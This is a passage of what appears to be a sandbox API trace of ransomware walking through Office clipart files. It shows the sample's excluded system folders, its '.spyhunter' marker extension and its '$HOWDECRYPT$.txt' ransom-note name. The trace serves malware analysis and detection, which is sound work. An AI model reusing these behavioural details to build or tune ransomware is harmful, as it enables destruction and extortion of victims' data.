0x2c16890 [0098.085] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.085] lstrcmpiW (lpString1="J0099163.WMF", lpString2="Windows") returned -1 [0098.085] lstrlenW (lpString="Windows") returned 7 [0098.085] lstrcmpiW (lpString1="J0099163.WMF", lpString2="$Recycle.bin") returned 1 [0098.085] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.085] lstrcmpiW (lpString1="J0099163.WMF", lpString2="System Volume Information") returned -1 [0098.085] lstrlenW (lpString="System Volume Information") returned 25 [0098.085] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 67 [0098.085] StrStrIW (lpFirst="J0099163.WMF", lpSrch=".spyhunter") returned 0x0 [0098.085] lstrcmpW (lpString1="J0099163.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.085] lstrcmpW (lpString1="J0099163.WMF", lpString2="_uninstalling_.png") returned 1 [0098.085] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 67 [0098.085] GetProcessHeap () returned 0x2c0000 [0098.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38b7e8 [0098.085] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2180) returned 0x2c16890 [0098.086] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.086] lstrcmpiW (lpString1="J0099164.WMF", lpString2="Windows") returned -1 [0098.086] lstrlenW (lpString="Windows") returned 7 [0098.086] lstrcmpiW (lpString1="J0099164.WMF", lpString2="$Recycle.bin") returned 1 [0098.086] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.086] lstrcmpiW (lpString1="J0099164.WMF", lpString2="System Volume Information") returned -1 [0098.086] lstrlenW (lpString="System Volume Information") returned 25 [0098.086] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF") returned 67 [0098.086] StrStrIW (lpFirst="J0099164.WMF", lpSrch=".spyhunter") returned 0x0 [0098.086] lstrcmpW (lpString1="J0099164.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.086] lstrcmpW (lpString1="J0099164.WMF", lpString2="_uninstalling_.png") returned 1 [0098.086] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF") returned 67 [0098.086] GetProcessHeap () returned 0x2c0000 [0098.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38b8b8 [0098.086] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2188) returned 0x2c16890 [0098.086] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.086] lstrcmpiW (lpString1="J0099165.JPG", lpString2="Windows") returned -1 [0098.086] lstrlenW (lpString="Windows") returned 7 [0098.086] lstrcmpiW (lpString1="J0099165.JPG", lpString2="$Recycle.bin") returned 1 [0098.086] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.086] lstrcmpiW (lpString1="J0099165.JPG", lpString2="System Volume Information") returned -1 [0098.086] lstrlenW (lpString="System Volume Information") returned 25 [0098.087] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 67 [0098.087] StrStrIW (lpFirst="J0099165.JPG", lpSrch=".spyhunter") returned 0x0 [0098.087] lstrcmpW (lpString1="J0099165.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.087] lstrcmpW (lpString1="J0099165.JPG", lpString2="_uninstalling_.png") returned 1 [0098.087] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 67 [0098.087] GetProcessHeap () returned 0x2c0000 [0098.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38b988 [0098.087] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2190) returned 0x2c16890 [0098.087] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.087] lstrcmpiW (lpString1="J0099166.JPG", lpString2="Windows") returned -1 [0098.087] lstrlenW (lpString="Windows") returned 7 [0098.087] lstrcmpiW (lpString1="J0099166.JPG", lpString2="$Recycle.bin") returned 1 [0098.087] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.087] lstrcmpiW (lpString1="J0099166.JPG", lpString2="System Volume Information") returned -1 [0098.087] lstrlenW (lpString="System Volume Information") returned 25 [0098.087] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG") returned 67 [0098.087] StrStrIW (lpFirst="J0099166.JPG", lpSrch=".spyhunter") returned 0x0 [0098.087] lstrcmpW (lpString1="J0099166.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.087] lstrcmpW (lpString1="J0099166.JPG", lpString2="_uninstalling_.png") returned 1 [0098.087] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG") returned 67 [0098.087] GetProcessHeap () returned 0x2c0000 [0098.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38ba58 [0098.088] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2198) returned 0x2c16890 [0098.088] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.088] lstrcmpiW (lpString1="J0099167.JPG", lpString2="Windows") returned -1 [0098.088] lstrlenW (lpString="Windows") returned 7 [0098.088] lstrcmpiW (lpString1="J0099167.JPG", lpString2="$Recycle.bin") returned 1 [0098.088] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.088] lstrcmpiW (lpString1="J0099167.JPG", lpString2="System Volume Information") returned -1 [0098.088] lstrlenW (lpString="System Volume Information") returned 25 [0098.088] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 67 [0098.088] StrStrIW (lpFirst="J0099167.JPG", lpSrch=".spyhunter") returned 0x0 [0098.088] lstrcmpW (lpString1="J0099167.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.088] lstrcmpW (lpString1="J0099167.JPG", lpString2="_uninstalling_.png") returned 1 [0098.088] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 67 [0098.088] GetProcessHeap () returned 0x2c0000 [0098.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38bb28 [0098.088] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x21a0) returned 0x2c16890 [0098.088] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.088] lstrcmpiW (lpString1="J0099168.JPG", lpString2="Windows") returned -1 [0098.088] lstrlenW (lpString="Windows") returned 7 [0098.088] lstrcmpiW (lpString1="J0099168.JPG", lpString2="$Recycle.bin") returned 1 [0098.088] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.088] lstrcmpiW (lpString1="J0099168.JPG", lpString2="System Volume Information") returned -1 [0098.089] lstrlenW (lpString="System Volume Information") returned 25 [0098.089] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 67 [0098.089] StrStrIW (lpFirst="J0099168.JPG", lpSrch=".spyhunter") returned 0x0 [0098.089] lstrcmpW (lpString1="J0099168.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.089] lstrcmpW (lpString1="J0099168.JPG", lpString2="_uninstalling_.png") returned 1 [0098.089] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 67 [0098.089] GetProcessHeap () returned 0x2c0000 [0098.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38bbf8 [0098.089] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x21a8) returned 0x2c16890 [0098.089] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.089] lstrcmpiW (lpString1="J0099169.WMF", lpString2="Windows") returned -1 [0098.089] lstrlenW (lpString="Windows") returned 7 [0098.089] lstrcmpiW (lpString1="J0099169.WMF", lpString2="$Recycle.bin") returned 1 [0098.089] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.089] lstrcmpiW (lpString1="J0099169.WMF", lpString2="System Volume Information") returned -1 [0098.089] lstrlenW (lpString="System Volume Information") returned 25 [0098.089] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF") returned 67 [0098.089] StrStrIW (lpFirst="J0099169.WMF", lpSrch=".spyhunter") returned 0x0 [0098.089] lstrcmpW (lpString1="J0099169.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.089] lstrcmpW (lpString1="J0099169.WMF", lpString2="_uninstalling_.png") returned 1 [0098.089] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF") returned 67 [0098.089] GetProcessHeap () returned 0x2c0000 [0098.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38bcc8 [0098.090] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x21b0) returned 0x2c16890 [0098.090] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.090] lstrcmpiW (lpString1="J0099170.WMF", lpString2="Windows") returned -1 [0098.090] lstrlenW (lpString="Windows") returned 7 [0098.090] lstrcmpiW (lpString1="J0099170.WMF", lpString2="$Recycle.bin") returned 1 [0098.090] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.090] lstrcmpiW (lpString1="J0099170.WMF", lpString2="System Volume Information") returned -1 [0098.090] lstrlenW (lpString="System Volume Information") returned 25 [0098.090] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF") returned 67 [0098.090] StrStrIW (lpFirst="J0099170.WMF", lpSrch=".spyhunter") returned 0x0 [0098.090] lstrcmpW (lpString1="J0099170.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.090] lstrcmpW (lpString1="J0099170.WMF", lpString2="_uninstalling_.png") returned 1 [0098.090] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF") returned 67 [0098.090] GetProcessHeap () returned 0x2c0000 [0098.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38bd98 [0098.091] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x21b8) returned 0x2c16890 [0098.091] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.091] lstrcmpiW (lpString1="J0099171.WMF", lpString2="Windows") returned -1 [0098.091] lstrlenW (lpString="Windows") returned 7 [0098.091] lstrcmpiW (lpString1="J0099171.WMF", lpString2="$Recycle.bin") returned 1 [0098.091] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.091] lstrcmpiW (lpString1="J0099171.WMF", lpString2="System Volume Information") returned -1 [0098.091] lstrlenW (lpString="System Volume Information") returned 25 [0098.091] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF") returned 67 [0098.091] StrStrIW (lpFirst="J0099171.WMF", lpSrch=".spyhunter") returned 0x0 [0098.091] lstrcmpW (lpString1="J0099171.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.091] lstrcmpW (lpString1="J0099171.WMF", lpString2="_uninstalling_.png") returned 1 [0098.091] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF") returned 67 [0098.091] GetProcessHeap () returned 0x2c0000 [0098.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38be68 [0098.091] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x21c0) returned 0x2c16890 [0098.091] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.091] lstrcmpiW (lpString1="J0099172.WMF", lpString2="Windows") returned -1 [0098.091] lstrlenW (lpString="Windows") returned 7 [0098.091] lstrcmpiW (lpString1="J0099172.WMF", lpString2="$Recycle.bin") returned 1 [0098.091] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.091] lstrcmpiW (lpString1="J0099172.WMF", lpString2="System Volume Information") returned -1 [0098.092] lstrlenW (lpString="System Volume Information") returned 25 [0098.092] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF") returned 67 [0098.092] StrStrIW (lpFirst="J0099172.WMF", lpSrch=".spyhunter") returned 0x0 [0098.092] lstrcmpW (lpString1="J0099172.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.092] lstrcmpW (lpString1="J0099172.WMF", lpString2="_uninstalling_.png") returned 1 [0098.092] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF") returned 67 [0098.092] GetProcessHeap () returned 0x2c0000 [0098.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38bf38 [0098.092] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x21c8) returned 0x2c16890 [0098.092] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.092] lstrcmpiW (lpString1="J0099173.WMF", lpString2="Windows") returned -1 [0098.092] lstrlenW (lpString="Windows") returned 7 [0098.092] lstrcmpiW (lpString1="J0099173.WMF", lpString2="$Recycle.bin") returned 1 [0098.092] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.092] lstrcmpiW (lpString1="J0099173.WMF", lpString2="System Volume Information") returned -1 [0098.092] lstrlenW (lpString="System Volume Information") returned 25 [0098.092] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF") returned 67 [0098.092] StrStrIW (lpFirst="J0099173.WMF", lpSrch=".spyhunter") returned 0x0 [0098.092] lstrcmpW (lpString1="J0099173.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.092] lstrcmpW (lpString1="J0099173.WMF", lpString2="_uninstalling_.png") returned 1 [0098.092] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF") returned 67 [0098.092] GetProcessHeap () returned 0x2c0000 [0098.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38c008 [0098.093] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x21d0) returned 0x2c16890 [0098.094] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.095] lstrcmpiW (lpString1="J0099174.WMF", lpString2="Windows") returned -1 [0098.096] lstrlenW (lpString="Windows") returned 7 [0098.096] lstrcmpiW (lpString1="J0099174.WMF", lpString2="$Recycle.bin") returned 1 [0098.096] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.096] lstrcmpiW (lpString1="J0099174.WMF", lpString2="System Volume Information") returned -1 [0098.096] lstrlenW (lpString="System Volume Information") returned 25 [0098.096] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF") returned 67 [0098.096] StrStrIW (lpFirst="J0099174.WMF", lpSrch=".spyhunter") returned 0x0 [0098.096] lstrcmpW (lpString1="J0099174.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.096] lstrcmpW (lpString1="J0099174.WMF", lpString2="_uninstalling_.png") returned 1 [0098.096] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF") returned 67 [0098.096] GetProcessHeap () returned 0x2c0000 [0098.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38c0d8 [0098.096] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x21d8) returned 0x2c16890 [0098.096] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.096] lstrcmpiW (lpString1="J0099175.WMF", lpString2="Windows") returned -1 [0098.096] lstrlenW (lpString="Windows") returned 7 [0098.096] lstrcmpiW (lpString1="J0099175.WMF", lpString2="$Recycle.bin") returned 1 [0098.096] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.096] lstrcmpiW (lpString1="J0099175.WMF", lpString2="System Volume Information") returned -1 [0098.096] lstrlenW (lpString="System Volume Information") returned 25 [0098.096] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF") returned 67 [0098.097] StrStrIW (lpFirst="J0099175.WMF", lpSrch=".spyhunter") returned 0x0 [0098.097] lstrcmpW (lpString1="J0099175.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.097] lstrcmpW (lpString1="J0099175.WMF", lpString2="_uninstalling_.png") returned 1 [0098.097] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF") returned 67 [0098.097] GetProcessHeap () returned 0x2c0000 [0098.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38c1a8 [0098.097] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x21e0) returned 0x2c16890 [0098.097] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.097] lstrcmpiW (lpString1="J0099176.WMF", lpString2="Windows") returned -1 [0098.097] lstrlenW (lpString="Windows") returned 7 [0098.097] lstrcmpiW (lpString1="J0099176.WMF", lpString2="$Recycle.bin") returned 1 [0098.097] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.097] lstrcmpiW (lpString1="J0099176.WMF", lpString2="System Volume Information") returned -1 [0098.097] lstrlenW (lpString="System Volume Information") returned 25 [0098.097] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF") returned 67 [0098.097] StrStrIW (lpFirst="J0099176.WMF", lpSrch=".spyhunter") returned 0x0 [0098.097] lstrcmpW (lpString1="J0099176.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.097] lstrcmpW (lpString1="J0099176.WMF", lpString2="_uninstalling_.png") returned 1 [0098.097] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF") returned 67 [0098.097] GetProcessHeap () returned 0x2c0000 [0098.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38c278 [0098.097] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x21e8) returned 0x2c16890 [0098.098] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.098] lstrcmpiW (lpString1="J0099177.WMF", lpString2="Windows") returned -1 [0098.098] lstrlenW (lpString="Windows") returned 7 [0098.098] lstrcmpiW (lpString1="J0099177.WMF", lpString2="$Recycle.bin") returned 1 [0098.098] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.098] lstrcmpiW (lpString1="J0099177.WMF", lpString2="System Volume Information") returned -1 [0098.098] lstrlenW (lpString="System Volume Information") returned 25 [0098.098] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF") returned 67 [0098.098] StrStrIW (lpFirst="J0099177.WMF", lpSrch=".spyhunter") returned 0x0 [0098.098] lstrcmpW (lpString1="J0099177.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.098] lstrcmpW (lpString1="J0099177.WMF", lpString2="_uninstalling_.png") returned 1 [0098.098] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF") returned 67 [0098.098] GetProcessHeap () returned 0x2c0000 [0098.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38c348 [0098.098] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x21f0) returned 0x2c16890 [0098.098] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.098] lstrcmpiW (lpString1="J0099178.WMF", lpString2="Windows") returned -1 [0098.098] lstrlenW (lpString="Windows") returned 7 [0098.098] lstrcmpiW (lpString1="J0099178.WMF", lpString2="$Recycle.bin") returned 1 [0098.098] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.098] lstrcmpiW (lpString1="J0099178.WMF", lpString2="System Volume Information") returned -1 [0098.098] lstrlenW (lpString="System Volume Information") returned 25 [0098.099] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF") returned 67 [0098.099] StrStrIW (lpFirst="J0099178.WMF", lpSrch=".spyhunter") returned 0x0 [0098.099] lstrcmpW (lpString1="J0099178.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.099] lstrcmpW (lpString1="J0099178.WMF", lpString2="_uninstalling_.png") returned 1 [0098.099] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF") returned 67 [0098.099] GetProcessHeap () returned 0x2c0000 [0098.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38c418 [0098.099] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x21f8) returned 0x2c16890 [0098.099] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.099] lstrcmpiW (lpString1="J0099179.WMF", lpString2="Windows") returned -1 [0098.100] lstrlenW (lpString="Windows") returned 7 [0098.101] lstrcmpiW (lpString1="J0099179.WMF", lpString2="$Recycle.bin") returned 1 [0098.101] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.101] lstrcmpiW (lpString1="J0099179.WMF", lpString2="System Volume Information") returned -1 [0098.101] lstrlenW (lpString="System Volume Information") returned 25 [0098.101] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF") returned 67 [0098.101] StrStrIW (lpFirst="J0099179.WMF", lpSrch=".spyhunter") returned 0x0 [0098.101] lstrcmpW (lpString1="J0099179.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.101] lstrcmpW (lpString1="J0099179.WMF", lpString2="_uninstalling_.png") returned 1 [0098.101] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF") returned 67 [0098.101] GetProcessHeap () returned 0x2c0000 [0098.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38c4e8 [0098.101] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2200) returned 0x2c16890 [0098.101] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.101] lstrcmpiW (lpString1="J0099180.WMF", lpString2="Windows") returned -1 [0098.102] lstrlenW (lpString="Windows") returned 7 [0098.102] lstrcmpiW (lpString1="J0099180.WMF", lpString2="$Recycle.bin") returned 1 [0098.102] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.102] lstrcmpiW (lpString1="J0099180.WMF", lpString2="System Volume Information") returned -1 [0098.102] lstrlenW (lpString="System Volume Information") returned 25 [0098.102] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF") returned 67 [0098.102] StrStrIW (lpFirst="J0099180.WMF", lpSrch=".spyhunter") returned 0x0 [0098.102] lstrcmpW (lpString1="J0099180.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.102] lstrcmpW (lpString1="J0099180.WMF", lpString2="_uninstalling_.png") returned 1 [0098.102] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF") returned 67 [0098.102] GetProcessHeap () returned 0x2c0000 [0098.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38c5b8 [0098.102] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2208) returned 0x2c16890 [0098.102] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.102] lstrcmpiW (lpString1="J0099181.WMF", lpString2="Windows") returned -1 [0098.102] lstrlenW (lpString="Windows") returned 7 [0098.102] lstrcmpiW (lpString1="J0099181.WMF", lpString2="$Recycle.bin") returned 1 [0098.102] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.102] lstrcmpiW (lpString1="J0099181.WMF", lpString2="System Volume Information") returned -1 [0098.102] lstrlenW (lpString="System Volume Information") returned 25 [0098.102] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF") returned 67 [0098.102] StrStrIW (lpFirst="J0099181.WMF", lpSrch=".spyhunter") returned 0x0 [0098.102] lstrcmpW (lpString1="J0099181.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.103] lstrcmpW (lpString1="J0099181.WMF", lpString2="_uninstalling_.png") returned 1 [0098.103] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF") returned 67 [0098.103] GetProcessHeap () returned 0x2c0000 [0098.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38c688 [0098.103] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2210) returned 0x2c16890 [0098.103] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.103] lstrcmpiW (lpString1="J0099182.WMF", lpString2="Windows") returned -1 [0098.103] lstrlenW (lpString="Windows") returned 7 [0098.103] lstrcmpiW (lpString1="J0099182.WMF", lpString2="$Recycle.bin") returned 1 [0098.103] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.103] lstrcmpiW (lpString1="J0099182.WMF", lpString2="System Volume Information") returned -1 [0098.103] lstrlenW (lpString="System Volume Information") returned 25 [0098.103] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, 